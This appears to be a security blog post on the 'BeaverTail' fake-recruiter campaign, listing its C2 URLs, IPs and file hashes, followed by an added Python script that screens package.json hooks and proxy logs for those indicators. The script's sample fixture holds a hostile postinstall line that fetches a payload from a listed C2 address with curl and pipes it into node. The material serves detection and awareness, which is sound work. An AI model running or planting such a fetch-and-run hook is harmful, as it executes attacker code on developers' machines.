How a fake AI recruiter delivers five staged malware disguised as a dream job
Overview
It starts like every developer’s favourite notification:
“You’ve been shortlisted for an AI engineering role.”
The company looks exciting - DLMind, an “AI-driven innovation lab.” The recruiter seems legit - Tim Morenc, CEDS, with a polished LinkedIn profile, professional tone, and a history of mutual connections.
But behind that friendly message lies BeaverTail - a malicious campaign engineered to hijack your curiosity, your code, and your credentials.
The Hook
Developers receive LinkedIn messages offering a lucrative remote position titled “Innovative AI Engineer.” The attacker, posing as Tim Morenc, invites them to collaborate on a private GitHub repository supposedly containing a coding assessment. The instructions are simple:
“Clone the repo, review the code, run the setup, and share your feedback.”
And that’s exactly what triggers the trap.
The Bite
The moment the provided setup script executes, it unfurls a five-stage payload - a meticulously crafted attack chain designed …
IoC
URLs
http://api.npoint.io/96979650f5739bcbaebb
http://api.npoint.io
http://172.86.89.10:4382/api/service/process/3e5fd7fdc21c6cfd419cc84fa67b869e
http://172.86.89.10:4382/api/service/makelog
http://172.86.89.10:4382/
http://172.86.89.10:4382/upload
http://172.86.89.10:4382
http://172.86.89.10
https://github.com/dlmind-tech/AI-Healthcare.git
https://github.com/dlmind-tech/AI-Healthcare
http://88.218.0.78:1224
http://88.218.0.78:2243
http://88.218.0.78:2243/
http://88.218.0.78
http://88.218.0.78:1224/client/3/603
http://88.218.0.78:1224/brow/3/603
http://88.218.0.78:1224/adc/3
http://88.218.0.78:1224/pdown
http://88.218.0.78:1224/uploads
http://88.218.0.78:1224/keys
http://88.218.0.78:1224/payload/3/603
http://95.164.17.24:1224
http://95.164.17.24:1224/keys
http://95.164.17.24:1224/any
http://95.164.17.24
http://loopsoft.tech
http://loopsoft.tech:6168/defy/v8
http://ip-api.com
https://deobfuscate.relative.im
IP addresses
88.218.0.78
95.164.17.24
172.86.89.10
File hashes (SHA-256)
ffed818b35b249db723741d3ec1cb7bc5a8e3e47821feb030d4a424717cd670e
b59187e77c19f5fcd9fdb14663fbdd91cf7110bfec1267676a61b5a85583bf58
99502507bfa92aee6d6b0220346410412be6cfd1ca1b28378b9e0958bd697342
967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d
006c6a04a741ba75e66d460b441c8984bad00c2566b262a9b579a86c649e788f
9daa4de89ea95bf5f7f97815ecee0d7435f03b1d50ff2222973bcc517daee160
32-character hex values (MD5 hashes or identifiers, as published; 3e5fd7… also appears as a path component of one of the 172.86.89.10 URLs above)
3e5fd7fdc21c6cfd419cc84fa67b869e
351535afd2d98b9a3a0e14905a60a345
e43673a2a77ed68fa6e8074167350f8f
Note: api.npoint.io, ip-api.com and deobfuscate.relative.im are public third-party services that the chain contacts; treat them as hunting context rather than standalone block indicators.
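The Hook asks the candidate to clone a repository and "run the setup"; the IoC list above is what that setup ends up talking to. The following is an added example, not code from the original post, showing the two checks a practitioner would run: inspect the cloned repo's install-time hooks for references to the listed infrastructure before running anything, and sweep proxy logs and file hashes against the same indicators afterwards. It assumes the setup step is an npm install (the page does not say what the setup step is); the package.json and proxy log lines are constructed for illustration, while the IPs, hosts and hashes are taken from the page's IoC list.

```python
"""Screen a cloned "coding assessment" repo and web-proxy logs against the
BeaverTail indicators listed on this page.

Added example, not code from the original post. The IP addresses, hosts and
hashes below are the page's own IoCs; the package.json and proxy log lines are
constructed for illustration and are not from the page.
"""
import json
import re

# Attacker infrastructure from the page's IoC list.
IOC_IPS = {"88.218.0.78", "95.164.17.24", "172.86.89.10"}
IOC_HOSTS = {"loopsoft.tech", "github.com/dlmind-tech/AI-Healthcare"}

# Public services the chain contacts (also in the page's list). They are
# hunting context, not block indicators on their own.
CONTEXT_HOSTS = {"api.npoint.io", "ip-api.com", "deobfuscate.relative.im"}

IOC_SHA256 = {
    "ffed818b35b249db723741d3ec1cb7bc5a8e3e47821feb030d4a424717cd670e",
    "b59187e77c19f5fcd9fdb14663fbdd91cf7110bfec1267676a61b5a85583bf58",
    "99502507bfa92aee6d6b0220346410412be6cfd1ca1b28378b9e0958bd697342",
    "967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d",
    "006c6a04a741ba75e66d460b441c8984bad00c2566b262a9b579a86c649e788f",
    "9daa4de89ea95bf5f7f97815ecee0d7435f03b1d50ff2222973bcc517daee160",
}
# 32-hex values from the page; 3e5fd7... also appears as a path component of
# one of the listed 172.86.89.10 URLs.
IOC_MD5 = {
    "3e5fd7fdc21c6cfd419cc84fa67b869e",
    "351535afd2d98b9a3a0e14905a60a345",
    "e43673a2a77ed68fa6e8074167350f8f",
}

# npm lifecycle hooks that run automatically during `npm install`.
# Assumption: the lure's "run the setup" step is an npm install; the page
# does not say what the setup step is.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def find_indicators(text):
    """Return (ioc_hits, context_hits), each a sorted list, for any text."""
    ioc = {ip for ip in IPV4_RE.findall(text) if ip in IOC_IPS}
    ioc |= {h for h in IOC_HOSTS if h in text}
    context = sorted(h for h in CONTEXT_HOSTS if h in text)
    return sorted(ioc), context


def check_package_json(package_json_text):
    """Flag lifecycle scripts in a package.json and any IoC they reference.

    A lifecycle script is what turns "run the setup" into code execution
    before the candidate has read a single line of the assessment.
    """
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for hook, command in scripts.items():
        if hook in LIFECYCLE_HOOKS:
            ioc, context = find_indicators(command)
            findings.append({"hook": hook, "command": command,
                             "ioc": ioc, "context": context})
    return findings


def scan_proxy_log(lines):
    """Return (line_number, indicator) pairs for lines touching IoC infrastructure."""
    hits = []
    for number, line in enumerate(lines, start=1):
        ioc, _ = find_indicators(line)
        hits.extend((number, indicator) for indicator in ioc)
    return hits


def classify_hash(digest):
    """Return 'sha256', 'md5' or None depending on which IoC set holds the digest."""
    d = digest.strip().lower()
    if d in IOC_SHA256:
        return "sha256"
    if d in IOC_MD5:
        return "md5"
    return None


# Constructed sample input (not from the page): a package.json whose
# postinstall hook pulls a stage from a listed C2 URL, plus proxy log lines.
SAMPLE_PACKAGE_JSON = """{
  "name": "ai-healthcare-assessment",
  "scripts": {
    "postinstall": "curl -s http://88.218.0.78:1224/payload/3/603 | node",
    "start": "node server.js"
  }
}"""

SAMPLE_PROXY_LOG = [
    "10:02:11 dev-laptop-07 GET http://88.218.0.78:1224/client/3/603 200",
    "10:02:12 dev-laptop-07 GET http://ip-api.com/json 200",
    "10:05:40 dev-laptop-07 GET https://registry.npmjs.org/express 200",
    "10:06:03 dev-laptop-07 POST http://172.86.89.10:4382/upload 200",
]

if __name__ == "__main__":
    for f in check_package_json(SAMPLE_PACKAGE_JSON):
        print(f"lifecycle hook {f['hook']!r}: {f['command']} -> IoC {f['ioc']}")
    for number, indicator in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"proxy log line {number}: contact with {indicator}")
    print(classify_hash("ffed818b35b249db723741d3ec1cb7bc5a8e3e47821feb030d4a424717cd670e"))
```

Run the package.json check before `npm install`, or install with `--ignore-scripts` and read the hooks by hand; the proxy sweep is deliberately insensitive to the public services (ip-api.com, npoint, the deobfuscator) so that a hit means contact with attacker-controlled hosts, not ordinary developer traffic.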